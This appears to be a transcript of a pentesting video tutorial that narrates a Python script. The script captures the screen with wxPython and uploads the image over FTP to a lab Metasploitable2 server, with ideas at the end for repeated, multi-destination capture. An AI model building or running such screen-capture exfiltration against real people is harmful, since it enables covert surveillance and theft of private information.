In this video, you're going to learn how to grab screenshots with Python. Additionally, once the screenshot is grabbed, we'll code a feature to send itself on a remote location, such as uploading itself to an FTP server. Now, this is very useful in scenarios where you need to conduct a lot of information gathering. Not all scenarios rely heavily on information gathering, even though this is part of the penetration testing methodology. So this is really the case for specificity. Now in Python, there are many libraries that you can use to take screenshots, and the one we'll be using here is WXPython. If you don't have it already, and I assume you don't, if you don't have it already installed, just open up a terminal or a command prompt in my case, and do pip or pip3 install WX Python. Great. With that out of the way, let's actually get into the coding. So we first start by importing WX Python with WX, and we'll also need the OS and the FTP lib modules. Now, for those of you who don't know, WXPython is a library that's heavily used in coding graphical applications or GUI applications with Python, such as Windows applications, for example. It's similar to tkinter, which is another GUI Python library. However, I'd like to think that's more developed than tkinter. Okay, so to build our screen grabber or our screenshot grabber, we'll first need to actually instantiate a WX app. And we do that with wx.app. So we have a variable w which instantiates a WX app. And then we also need another variable to make a call to screenDC method that enables us to get the screen. So we'll say screen equals WX screenDC. Now, I won't go into details in any of these particular methods because there are entire books written on WX Python. Here I will just use them conveniently. Okay, now we need to create an empty bitmap, sort of like you can think of a bitmap in this case like a canvas that has the size of the screen. So first we'll say size equals screen get size, okay, and then bmap equals WX bitmap size 0 and also size 1. The next thing we need is a memory device context to enable us to draw graphics onto the bitmap we've just created. So we'll say memo equals WX memory DC bmap. So this is the parameter or the argument that we need to specify. And then we just copy our previously defined screen into this context. So we do that with memo dot blit 00, and I'll explain shortly. Size 0, size 1, screen 0, 0. Okay, so we have the first two zeros for the X and Y positions of the destination device. Then we have the height and the width of the area we copy. Then we have the source from what we copy, which is the screen. And finally, we have the X and Y of the source device context. Okay, so this is all interesting stuff, and it was quite complicated for me to wrap my head around it when I saw it the first time, so don't get intimidated if you don't understand everything here. However, if you want to precisely know what all these methods do in essence, you can further study the documentation of WX Python at wxpython.org, but here we just want the straight code. Alright, now what we'll do is to delete the mem object we've created because we don't need it anymore. So we'll say del memo And lastly, we'll save the bmap or bitmap as PNG, which is more straightforward. So we'll say bmap dot save file. We'll give it a name, grabbed.png, and a parameter wx bitmap type PNG, which is more straightforward, like I said. So we have the file name, all right, and then the method in wx library that defines the type we want our image to be saved as. So it's PNG, and that's it. Now you might be wondering or saying to yourself that we had to write so many lines of code just to take a screenshot. Yes, that is correct. And there are higher level libraries in Python such as PyScreenshot or others that would let you do the same thing in 2 or 3 lines of code. My purpose for this video was to go a bit deeper and actually get into the graphics of it to a certain extent, so to speak. Okay, that said, let's actually code the fun part of it, which is how the screenshot will send itself over FTP to a remote server. So at the top we've imported ftplib, and first what we need to do is to create a session. So let's call it ses underscore equals ftplib.ftp, and then here we'll have to specify the IP of our machine. So 192.168, let's say 01, and we also need to specify a username for the FTP and a password for the FTP, because in order to actually be able to upload a file to the FTP server, you need to provide credentials. So msfadmin. So the FTP server we'll use for this purpose is a vulnerable machine called Metasploitable2, which is up and running here. So this is Metasploitable2, which runs the FTP server. Okay, now what we need to do is to actually open our screenshot file in read binary mode. So we'll say file underscore equals open, let's say grabbed.png, like I said, in read binary mode. And then we have to send it over FTP using the method store binary from the ftplib library. So we'll say ses underscore dot store binary, and then we need to send the command store, and we'll upload the file to tmp folder as grabbed.png. So .png, and what we need to store in this tmp grab png is whatever information is in our file underscore, which is the screenshot we've taken. Now, as a rule of good practice, we close both the file and the session before terminating or finishing the code for the script. So we'll say file underscore dot close, and then ses underscore dot quit. Okay, and that's actually pretty much it. Now, like I said, I will be demonstrating this and make sure that it all works. So the FTP server is up and running here, and like I said, it's Metasploitable2, and we need to find its IP address with the ifconfig. And as you can see, it's 192.168.85.128. So it's 85.128. Alright, let's save the script. Then I'm going to have a command prompt and navigate to the location of the script. And then I can simply run it with pi-3 grabbed.py. And if everything worked correctly, we should have our screenshot uploaded in the TMP folder on the FTP server. So if I hit enter, it's going to take a screenshot, and then it's going to send it over into the remote location in the TMP folder. Now, if we look in the TMP folder, so cd TMP, there's nothing in here, just some random file. Okay, and then if I run this, enter, it should take the screenshot and it should already be sent over here. So if I do ls once again, we can see we have the grabbed.png. If we look with ls-a, ls-al more precisely, we can see that is 81,000 bytes or so. And if I look on the desktop, if I hover over it, it's roughly 79.3, which is exactly the same size. And if I look into it, there it is, the screenshot. So this was one way to code a screenshot grabber that uploads itself to a remote location. Now make sure to study the WX Python and the FTP libraries if you want to get more in-depth understanding of how they work and what their capabilities are. As always, you can further greatly expand the capabilities of this script by making it, for example, upload itself to multiple locations or sending itself via email. You could also timestamp and take multiple screenshots at multiple points in time, and these are just a few ideas, but there is a lot more this script or program can be developed into. The only limit is your imagination.